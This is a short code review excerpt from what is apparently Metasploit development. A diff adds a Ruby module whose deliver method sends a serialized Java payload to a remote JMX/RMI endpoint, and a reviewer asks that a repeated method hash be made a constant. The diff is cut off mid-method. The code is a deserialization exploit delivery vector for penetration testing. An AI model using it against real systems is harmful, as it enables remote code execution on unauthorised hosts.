lib/msf/core/exploit/java/serialized/rmi/jmx.rb

```diff
@@ -0,0 +1,701 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Java::Serialized::RMI
+
+    class JMXInvokeDeserVector < RMICallDeserVector
+      # this should take the RMIServer information,
+      # actual connection is made here
+      def	initialize(host, port, objId, uid: nil, ssl: false, creds: nil, ctx: nil, name: nil, method: nil)
+        super(host, port, objId, uid: uid, ssl: ssl, ctx: ctx)
+        @creds = creds
+        @name = name
+        @method = method
+      end
+
+      def id
+        ['deser', @host, @port, @ctx.gadgets]
+      end
+
+      def prio
+        50
+      end
+
+      def deliver(payl)
+        client = Rex::Java::JRMP::JRMPClient.new(@host, @port, @ctx.reg, ssl: @ssl)
+        # newClient
+        jmxref = Rex::Java::JRMP.Util.unwrap_ref(
+          client.call(@objId, -1, -1089742558549201240, [@creds], uid: @uid)
+        )
+
+        args = [
+          Rex::Java::Serialization::Metamodel::JavaObject.new('Ljavax/management/ObjectName;', @name),
+          @method,
+          Rex::Java::JRMP::Util.make_marshalledobject(
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/Object;', [payl]), ctx.reg
+          ),
+          Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', ['java.lang.String']),
+          nil
+        ]
+
+        begin
+          client.call(jmxref['objid'], -1, 1434350937885235744, args, uid: jmxref['uid'])
```

Comment:
`1434350937885235744` seems to appear a lot for no adequately explained reason. Perhaps it should be defined as a constant somewhere.